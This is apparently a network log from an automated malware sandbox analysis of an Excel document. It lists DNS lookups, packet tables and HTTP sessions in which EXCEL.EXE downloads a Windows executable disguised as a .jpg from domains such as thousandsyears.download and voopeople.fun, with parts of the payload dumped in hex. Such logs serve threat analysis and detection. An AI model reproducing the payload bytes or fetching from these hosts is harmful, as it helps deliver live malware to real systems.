                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097253084 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097255945 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097681046 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097717047 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.097744942 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.098155975 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.098630905 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.098690987 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.098735094 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.099472046 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.099499941 CEST4434917213.224.92.73192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.099517107 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.099549055 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.230747938 CEST4917180192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.231028080 CEST49170443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.253277063 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.291825056 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.291897058 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.292399883 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.331479073 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.803194046 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.803231001 CEST8049173104.21.37.209192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.803318024 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:33.411614895 CEST4917380192.168.2.22104.21.37.209
                                                                                                                                                                                                  Jul 6, 2021 15:12:33.411752939 CEST49172443192.168.2.2213.224.92.73
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.269253016 CEST4916780192.168.2.22104.21.55.83
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.269767046 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.270422935 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.307924032 CEST8049166172.67.194.117192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.308090925 CEST4916680192.168.2.22172.67.194.117
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.309639931 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.309844971 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.310702085 CEST8049167104.21.55.83192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:14:20.310909033 CEST4916780192.168.2.22104.21.55.83

                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.311832905 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.375283957 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.585585117 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.647394896 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.828290939 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.886183977 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.583837032 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.651139975 CEST53612008.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.677966118 CEST4954853192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.740823984 CEST53495488.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.765743017 CEST5562753192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.820565939 CEST53556278.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.829664946 CEST5600953192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.887166023 CEST53560098.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.016415119 CEST6186553192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.070559978 CEST53618658.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.091170073 CEST5517153192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.145395041 CEST53551718.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.643636942 CEST5249653192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.703924894 CEST53524968.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.711291075 CEST5756453192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.766550064 CEST53575648.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.363607883 CEST6300953192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.418677092 CEST53630098.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.486850977 CEST5931953192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.541831970 CEST53593198.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.122390985 CEST5307053192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.178709030 CEST53530708.8.8.8192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.186435938 CEST5977053192.168.2.228.8.8.8
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.251311064 CEST53597708.8.8.8192.168.2.22

                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.311832905 CEST192.168.2.228.8.8.80xccaeStandard query (0)thousandsyears.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.585585117 CEST192.168.2.228.8.8.80x3dfeStandard query (0)voopeople.funA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.828290939 CEST192.168.2.228.8.8.80x315eStandard query (0)uppercilio.funA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.583837032 CEST192.168.2.228.8.8.80xa3a3Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.677966118 CEST192.168.2.228.8.8.80x4023Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.765743017 CEST192.168.2.228.8.8.80xb163Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.829664946 CEST192.168.2.228.8.8.80xcc9cStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.016415119 CEST192.168.2.228.8.8.80xc330Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.091170073 CEST192.168.2.228.8.8.80x6848Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.643636942 CEST192.168.2.228.8.8.80x8766Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.711291075 CEST192.168.2.228.8.8.80x4177Standard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.363607883 CEST192.168.2.228.8.8.80x96ceStandard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.486850977 CEST192.168.2.228.8.8.80x45a5Standard query (0)aws.amazon.comA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.122390985 CEST192.168.2.228.8.8.80xbb9fStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.186435938 CEST192.168.2.228.8.8.80xa14dStandard query (0)astrocycle.downloadA (IP address)IN (0x0001)

                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.375283957 CEST8.8.8.8192.168.2.220xccaeNo error (0)thousandsyears.download172.67.198.51A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.375283957 CEST8.8.8.8192.168.2.220xccaeNo error (0)thousandsyears.download104.21.52.111A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.647394896 CEST8.8.8.8192.168.2.220x3dfeNo error (0)voopeople.fun172.67.194.117A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.647394896 CEST8.8.8.8192.168.2.220x3dfeNo error (0)voopeople.fun104.21.12.122A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.886183977 CEST8.8.8.8192.168.2.220x315eNo error (0)uppercilio.fun104.21.55.83A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.886183977 CEST8.8.8.8192.168.2.220x315eNo error (0)uppercilio.fun172.67.146.88A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.651139975 CEST8.8.8.8192.168.2.220xa3a3No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.651139975 CEST8.8.8.8192.168.2.220xa3a3No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.651139975 CEST8.8.8.8192.168.2.220xa3a3No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.740823984 CEST8.8.8.8192.168.2.220x4023No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.740823984 CEST8.8.8.8192.168.2.220x4023No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.740823984 CEST8.8.8.8192.168.2.220x4023No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.820565939 CEST8.8.8.8192.168.2.220xb163No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.820565939 CEST8.8.8.8192.168.2.220xb163No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.887166023 CEST8.8.8.8192.168.2.220xcc9cNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:23.887166023 CEST8.8.8.8192.168.2.220xcc9cNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.070559978 CEST8.8.8.8192.168.2.220xc330No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.070559978 CEST8.8.8.8192.168.2.220xc330No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.070559978 CEST8.8.8.8192.168.2.220xc330No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.145395041 CEST8.8.8.8192.168.2.220x6848No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.145395041 CEST8.8.8.8192.168.2.220x6848No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.145395041 CEST8.8.8.8192.168.2.220x6848No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.703924894 CEST8.8.8.8192.168.2.220x8766No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.703924894 CEST8.8.8.8192.168.2.220x8766No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.766550064 CEST8.8.8.8192.168.2.220x4177No error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:27.766550064 CEST8.8.8.8192.168.2.220x4177No error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.418677092 CEST8.8.8.8192.168.2.220x96ceNo error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.418677092 CEST8.8.8.8192.168.2.220x96ceNo error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.418677092 CEST8.8.8.8192.168.2.220x96ceNo error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.541831970 CEST8.8.8.8192.168.2.220x45a5No error (0)aws.amazon.comtp.8e49140c2-frontier.amazon.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.541831970 CEST8.8.8.8192.168.2.220x45a5No error (0)tp.8e49140c2-frontier.amazon.comdr49lng3n1n2s.cloudfront.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.541831970 CEST8.8.8.8192.168.2.220x45a5No error (0)dr49lng3n1n2s.cloudfront.net13.224.92.73A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.178709030 CEST8.8.8.8192.168.2.220xbb9fNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.178709030 CEST8.8.8.8192.168.2.220xbb9fNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.251311064 CEST8.8.8.8192.168.2.220xa14dNo error (0)astrocycle.download172.67.213.115A (IP address)IN (0x0001)
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.251311064 CEST8.8.8.8192.168.2.220xa14dNo error (0)astrocycle.download104.21.37.209A (IP address)IN (0x0001)

                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                  • thousandsyears.download
                                                                                                                                                                                                  • voopeople.fun
                                                                                                                                                                                                  • uppercilio.fun
                                                                                                                                                                                                  • astrocycle.download

                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  0192.168.2.2249165172.67.198.5180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.430273056 CEST0OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                  Host: thousandsyears.download
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506335974 CEST2INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:20 GMT
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Content-Length: 57856
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Age: 4570
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=O0dc7lvLICauGXDuIZ%2BlUJ0czK0%2FHrzDaLd78hxuxDslW%2FEG7dUbO8GtBLbuhCTL9p3xRamKpR049uJzRM%2F%2BPaEAQMK2guwOR06G7FUf9ZRr7bwsf%2FtO4ngVq0uKYPxd5lcxgN4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a91587ef2a4a9e-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506375074 CEST3INData Raw: 00 00 cc 00 00 00 00 00 01 00 00 02 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: @@
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506395102 CEST4INData Raw: 00 00 35 89 b4 5a f6 89 05 6b dc 00 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05
                                                                                                                                                                                                  Data Ascii: 5Zk$#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${H
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506411076 CEST6INData Raw: b2 00 00 00 89 84 24 90 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24
                                                                                                                                                                                                  Data Ascii: $H$HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506428003 CEST7INData Raw: 0d 47 d2 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84
                                                                                                                                                                                                  Data Ascii: G$$D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506448984 CEST8INData Raw: 8b b4 24 b8 00 00 00 48 89 74 24 70 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00
                                                                                                                                                                                                  Data Ascii: $Ht$pH$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506469965 CEST10INData Raw: 8c 24 ec 01 00 00 48 8b 94 24 a0 00 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50
                                                                                                                                                                                                  Data Ascii: $H$L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLH
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506489992 CEST11INData Raw: 00 0f 85 9e 00 00 00 8b 44 24 60 89 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00
                                                                                                                                                                                                  Data Ascii: D$`$DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$T
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506510973 CEST13INData Raw: 39 00 0f 84 86 00 00 00 48 8b 44 24 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24
                                                                                                                                                                                                  Data Ascii: 9HD$PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506531954 CEST14INData Raw: 45 89 c1 46 0f b7 04 4a 44 89 c2 44 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24
                                                                                                                                                                                                  Data Ascii: EFJDDDHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$P
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.507344007 CEST16INData Raw: 89 4c 24 30 48 8b 4c 24 30 48 89 8c 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24
                                                                                                                                                                                                  Data Ascii: L$0HL$0H$H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  1192.168.2.2249166172.67.194.11780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.691818953 CEST63OUTGET /div/44376,8555986111.jpg HTTP/1.1
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  UA-CPU: AMD64
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                  Host: voopeople.fun
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.766729116 CEST64INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 06 Jul 2021 13:12:20 GMT
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Content-Length: 57856
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  Content-Disposition: attachment; filename=lsdfik.fml
                                                                                                                                                                                                  Cache-Control: max-age=14400
